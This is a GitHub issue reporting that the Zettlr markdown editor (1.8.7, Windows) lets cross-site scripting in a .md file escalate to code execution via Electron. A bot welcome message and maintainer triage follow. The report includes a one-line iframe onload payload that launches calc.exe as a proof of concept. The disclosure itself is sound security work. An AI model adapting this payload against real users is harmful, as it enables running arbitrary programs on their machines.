Cross-site scripting leads to Remote Code Execution #1716

Closed
soulfoodisgood opened this issue Feb 5, 2021 · 2 comments
Labels
bug A bug that affects the functionality of Zettlr. confirmed At least two users and/or the developers confirmed this issue. pinned Indicates this issue should not be automatically handled by the bots. priority:high This issue has high priority and should be implemented asap. security Pull requests that address a security vulnerability
Comments


soulfoodisgood commented Feb 5, 2021

Description

XSS leads to remote code execution

Reproducing

  1. Download the crafted .md file (https://drive.google.com/file/d/1j9p1bL75ezWIIRbg0hb65-02jIt2u8OX/view?usp=sharing)
    Or make the .md file yourself. Foo.md content:
    <iframe src=x onload="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')"></iframe>
  2. Open the file with Zettlr 1.8.7 (Windows version)
  3. Once the page refreshes (or you click anywhere to trigger a refresh), the calculator pops up.

[Screenshot]

Expected behaviour

XSS payload shouldn't execute
Set nodeIntegration to false

Platform

  • OS and version: Windows 10 x64
  • Zettlr Version: 1.8.7

Additional information

@boring-cyborg

boring-cyborg bot commented Feb 5, 2021

Thanks so much for opening up your first issue here on the repository! 🎉 We would like to warmly welcome you to the community behind the app! ☺️ We'll check in soon and have a look at your issue. In the meantime, you can check your issue and make sure it aligns with our contribution guidelines! Here's the comprehensive list:

Enhancements

An enhancement takes a feature and improves or alters its behaviour. Please make sure to argue how your proposition will aid non-technical text workers, and why it can't be emulated easily with other features or apps!

Feature requests

Feature requests introduce whole new features into the app. This requires a lot of work, so these might be turned down if the implementation costs supersede the benefits we expect to see from implementing it. Please do not be disappointed if that happens. It likely has nothing to do with your great request but simply with us and our missing resources!
You can of course always ask someone to implement this feature, because a PR with a working new feature has much higher chances of being merged! :)

Bug reports

Please note that one of the main reasons for why bug reports cannot be addressed is that there's not enough information for us to find and fix the bug you describe, so make sure you try to pinpoint the bug as close as possible.
The ideal bug report for us has two qualities:

  1. The bug is always reproducible, at least within a certain context.
  2. We know exactly what specifically goes wrong, and there is consensus on what should happen instead.

Please note that if you encounter behaviour that does not align with your expectations of what would happen, this might as well be simply intended behaviour and we need to simply clarify why the behaviour is the way it is. This is not to be considered a bug and such issues may be closed! Suggest an enhancement instead!
But now, have a great day and thank you again!

@nathanlesage
Member

Absolutely true, Abricotine worked around this using a whitelist of pages. I have to implement something similar.

@nathanlesage nathanlesage added bug A bug that affects the functionality of Zettlr. confirmed At least two users and/or the developers confirmed this issue. pinned Indicates this issue should not be automatically handled by the bots. priority:high This issue has high priority and should be implemented asap. labels Feb 8, 2021
@nathanlesage nathanlesage added this to To do in Zettlr 2.x via automation Feb 8, 2021
@nathanlesage nathanlesage added the security Pull requests that address a security vulnerability label Feb 8, 2021
Zettlr 2.x automation moved this from To do to Done Apr 21, 2021